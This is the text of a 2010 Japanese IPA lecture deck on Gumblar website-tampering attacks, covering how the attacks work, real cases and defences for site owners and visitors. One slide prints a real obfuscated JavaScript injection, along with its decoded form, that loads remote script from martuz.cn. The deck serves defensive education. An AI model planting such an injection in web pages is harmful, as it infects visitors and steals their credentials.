終息しない ガンブラー攻撃 その対策は? 2010 年 10 月 28 日独立行政法人情報処理推進機構 セキュリティセンターウイルス 不正アクセス対策グループ主幹加賀谷伸一郎 Copyright 2010 独立行政法人情報処理推進機構
本日の講演内容 1. ガンブラー攻撃 についての復習 2. 改ざんの実例 3. 対策方法の整理 Copyright 2010 独立行政法人情報処理推進機構 2
ガンブラー の解説 ガンブラー (Gumblar) とは? ウェブ経由でパソコンにウイルスを感染させようとする攻撃手法の一種 (Drive-by download) ウェブサイト改ざん と ウェブ感染型ウイルス を組み合わせた攻撃 正規のサイト が改ざんされるため サイト閲覧者の警戒度は低い IPA に情報が寄せられた改ざんサイト情報は 100 件以上 (2010 年 6 月以降 ) Copyright 2010 独立行政法人情報処理推進機構 3
正規のウェブサイトを経由した攻撃とは 正規ウェブサイトを改ざんして利用者が攻撃される http://.co.jp/ http://.ne.jp/ http://.or.jp/ Copyright 2010 独立行政法人情報処理推進機構 4
2010 年版 10 大脅威 1 位 変化を続けるウェフ サイト改ざんの手口 Copyright 2010 独立行政法人情報処理推進機構 5
ガンブラー攻撃の場合は <script> 悪意あるウェブサイトへ行け!! 悪意あるサイトにあるスクリプトを読め! </script> 悪意あるウェブサイト gumblar.cn でも裏では 悪意あるコードが挿入されている 見た目はいつも通り 同時にこちらへも 閲覧改ざんされた正規ウェブサイト感染! 一般利用者 Copyright 2010 独立行政法人情報処理推進機構 6
ガンブラー攻撃の全体図 Copyright 2010 独立行政法人情報処理推進機構 7
サイト閲覧者にとっての脅威 セキュリティ対策が不十分なパソコンでは サイトを閲覧するだけでウイルスに感染させられてしまい かつ ウイルスに感染したことが見た目には全く分からない場合がある 有名企業のウェブサイトが攻撃に使われる場合があるため 不審なウェブサイトを閲覧しない といった回避策が有効とならず 日常的に利用しているウェブサイトが突然危険なウェブサイトとなる可能性もある 悪意あるサイトに仕掛けられるウイルスは攻撃者が任意にコントロールできるため 閲覧者はどのようなウイルスに感染させられるか予測できない Copyright 2010 独立行政法人情報処理推進機構 8
サイト閲覧者側の被害事例 現在のところ 次に挙げるウイルスに感染した事例が報告されている ウェブサイト管理用の ID とパスワード (ftp のアカウント情報 ) を盗むウイルス パソコン内のソフトで保存している ID とパスワード情報を盗むウイルス (ftpクライアントやie6) 偽セキュリティ対策ソフト型ウイルス ( ウイルスが発見されたという偽の表示を行い 駆除するために偽セキュリティ対策ソフトの 有償版 の購入を迫るウイルス ) 周囲のマシンにDoS 攻撃を仕掛けるウイルス 今後 どのようなウイルスが仕掛けられるか分からない! Copyright 2010 独立行政法人情報処理推進機構 9
連鎖するガンブラー攻撃の被害 ウェブサイトの改ざん & ウイルスの配置 攻撃者 攻撃に使われるウェブサイト 1 3 ウェブサイト管理用 ID とパスワードの盗難 4 1 ID=satou PASS=abc 2 Copyright 2010 独立行政法人情報処理推進機構 ウェブ利用者かつウェブサイトの管理者 一般利用者と同じ仕組みでウイルス感染 10
1. ガンブラー攻撃 についての復習 2. 改ざんの実例 3. 対策方法の整理 Copyright 2010 独立行政法人情報処理推進機構 11
2009 年 5 月に発見した事例 <script language=javascript><!-- (function(){var eaw='%';var yvwnr=('va-72-20-61-3d-22-53-63-72iptengine-22-2cb-3d-22ve-72-73ion()-2b-22-2cj-3d-22-22-2cu-3dnavi-67ator-2euseragent-3bif-28-28u-2e-69n-64e-78o-66(-22-43- 68ro-6de-22)-3c0)-26-26(-75-2eindexOf(-22Win-22)-3e0)-26-26(u-2eindexOf(-22NT-206-22-29-3c-30)- 26-26-28-64o-63u-6dent-2ec-6fokie-2e-69ndex-4ff-28-22-6d-69ek-3d-31-22)-3c0)-26-26-28-74-79pe-6ff- 28zrv-7a-74-73-29-21-3d-74yp-65-6ff(-22A-22-29))-7bzrvzts-3d-22A-22-3beva-6c(-22if-28w-69-6edow- 2e-22+a+-22-29j-3d-6a+-22+a+-22Major-22+b+a-2b-22Mi-6eor-22+b+a+-22Build-22+b+-22j-3b-22-29- 3bdocu-6d-65nt-2ew-72ite(-22-3c-73cript-20sr-63-3d-2f-2fma-72-22+-22tuz-2e-63-6e-2f-76id-2f-3f-69d- 3d-22-2bj+-22-3e-3c-5c-2fs-63rip-74-3e-22)-3b-7d').replace(/-/g,eaW);eval(unescape(yvwNr))})(); var a= ScriptEngine,b= Version()+,j=,u=navigator.userAgent; g if((u.indexof( Chrome )<0)&&(u.indexOf( Win )>0)&&(u.indexOf( NT 6 ) <0) && (document.cookie.indexof( miek=1 ) <0) && (typeof(zrvzts)!= replace 操作 ( - を % に置換 ) unescape 関数でデコード typeof( A ))){zrvzts="a";eval("if(window."+a+")j=j+"+a+"major"+b+a+"minor"+b+a+"build"+b+"j;"); document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+">< /script>");} j p martuz.cn に飛ばされるようになっていた! Copyright 2010 独立行政法人情報処理推進機構 12
2009 年 12 月に発見した事例 Copyright 2010 独立行政法人情報処理推進機構 13
2010 年 8 月 10 月に発見した事例 HTMLファイルの末尾や冒頭に1 行 難読化されていない 悪意あるサイトの.jsファイルや.phpファイルを読み込むスクリプト Copyright 2010 独立行政法人情報処理推進機構 14
1. ガンブラー攻撃 についての復習 2. 改ざんの実例 3. 対策方法の整理 Copyright 2010 独立行政法人情報処理推進機構 15
改ざんを防ぐためのサイト管理方法 パスワードの強化 複数人での使い回しもしない アクセス制限 ウェブサイトを更新できる場所を組織内 のみに限定するよう ネットワークやサーバの構成を見直す もし インターネット経由でウェブサイトを更新する必要がある場合でも 接続元 IPアドレスを制限したりVPNを導入するなど ftp 以外でサイト更新 ftp 接続は拒否し他の方法で SSH(Secure SHell) の scp(secure Copy) コマンド FTPS(File Transfer Protocol over SSL/TLS) 更新専用パソコンの導入 ウェブサイトを更新するための専用パソコンを導入する このパソコンでは ウイルスによる被害を防止するためにウェブの閲覧やメールの確認をせず ウイルス対策ソフトを最新の状態にし 可能な限り脆弱性を解消しておく 専用ネットからの更新ならなお良し 16 Copyright 2010 独立行政法人情報処理推進機構
改ざんを防ぐためのサイト管理方法 scp FTPS など ftp 以外でサイト更新 VPN など アクセス制限 外部のウェブサイト管理者 Copyright 2010 独立行政法人情報処理推進機構 17
ウェブページ更新用パソコンでの対策 ウェブページのupload 専用とし メール送受信やウェブサイト閲覧はしない ウェブサイトの改ざん & ウイルスの配置 攻撃者 攻撃に使われるウェブサイト ウェブサイト管理用 ID とパスワードの盗難 被害の連鎖を断ち切る! ID=satou PASS=abc Copyright 2010 独立行政法人情報処理推進機構 ウェブ利用者かつウェブサイトの管理者 一般利用者と同じ仕組みでウイルス感染 18
改ざんに気付くためのサイト管理方法 ウェブサイト上にメールアドレス等の連絡先を掲載しておくことで 外部から指摘が クリーンな状態のウェブページファイルを 安全な形 (DVDに焼くなど) で別途保管しておき ウェブサーバ上のファイルと定期的に比較 ウェブサイトの更新等に使用する ftp 等のアクセスログを定期的にチェック 改ざんを早期に発見するためのウェブサイト改ざん検知サービスなどを利用 ( 悪意あるサイトへのリンクがないかチェック可能ならなお良し ) Copyright 2010 独立行政法人情報処理推進機構 19
なるべくお金を掛けない方法はないの? ウイルス対策ソフト入りパソコンで 管理しているウェブページを閲覧し ウイルス警告が出ない状態を維持すべく手動で監視 ウイルス検知精度を上げるには 利用するウイルス対策ソフトの数を増やす ( それに伴いパソコンの台数も増やす必要あり ) ウェブページ監視の頻度を上げる (1 日毎? 何時間毎? 何分毎?) 無料のウェブサイトチェックサービスを利用 VirusTotal http://www.virustotal.com/index.html#url-submission / Copyright 2010 独立行政法人情報処理推進機構 20
VirusTotal でのチェック例 Copyright 2010 独立行政法人情報処理推進機構 21
ウェブブラウザによる警告の例 Copyright 2010 独立行政法人情報処理推進機構 22
検索サイトによる警告の例 それでも見ようとしてクリックすると Copyright 2010 独立行政法人情報処理推進機構 23
検索サイトによる警告の例 ( つづき ) Copyright 2010 独立行政法人情報処理推進機構 24
改ざん被害発生時の対処 早急なウェブサイトの公開停止 加害者 にならないために 改ざん箇所の洗い出し等の調査 ウェブページファイル比較 ftp アクセスログ確認 全ウェブページファイルを DL し ウイルスチェック ウェブサイトを再公開する場合の注意点 サイト閲覧者に向けた事実告知が重要 事実の説明 改ざん箇所 改ざん期間 想定される被害内容 改ざん期間ウイルスチェック方法 連絡先明示など Copyright 2010 独立行政法人情報処理推進機構 25
サイト閲覧者側の対策方法 ウイルス対策ソフトの導入と適切な運用 ウイルス定義ファイルを最新に保つことが必須! 統合型セキュリティ対策ソフトがオススメ ( 有害サイトのブロック機能が有効 ) 脆弱性の解消 OS(Windows など ) その他ソフト全てを最新に! こまめなアップデートが必須! ( ご参考 ) MyJVN バージョンチェッカ (IPA) http://jvndb.jvn.jp/apis/myjvn/#vccheck 2010 年 10 月現在 Windows XP と Vista に対応 Copyright 2010 独立行政法人情報処理推進機構 26
MyJVN バージョンチェッカ実施例 Copyright 2010 独立行政法人情報処理推進機構 27
セキュリティセンター (IPA/ISEC) http://www.ipa.go.jp/security/ 情報セキュリティ安心相談窓口 : TEL 03(5978)7509 (IPA 職員による対応は平日 10:00-12:00 13:30-17:00) FAX 03(5978)7518 E-mail: anshin@ipa.go.jp Copyright 2010 独立行政法人情報処理推進機構 28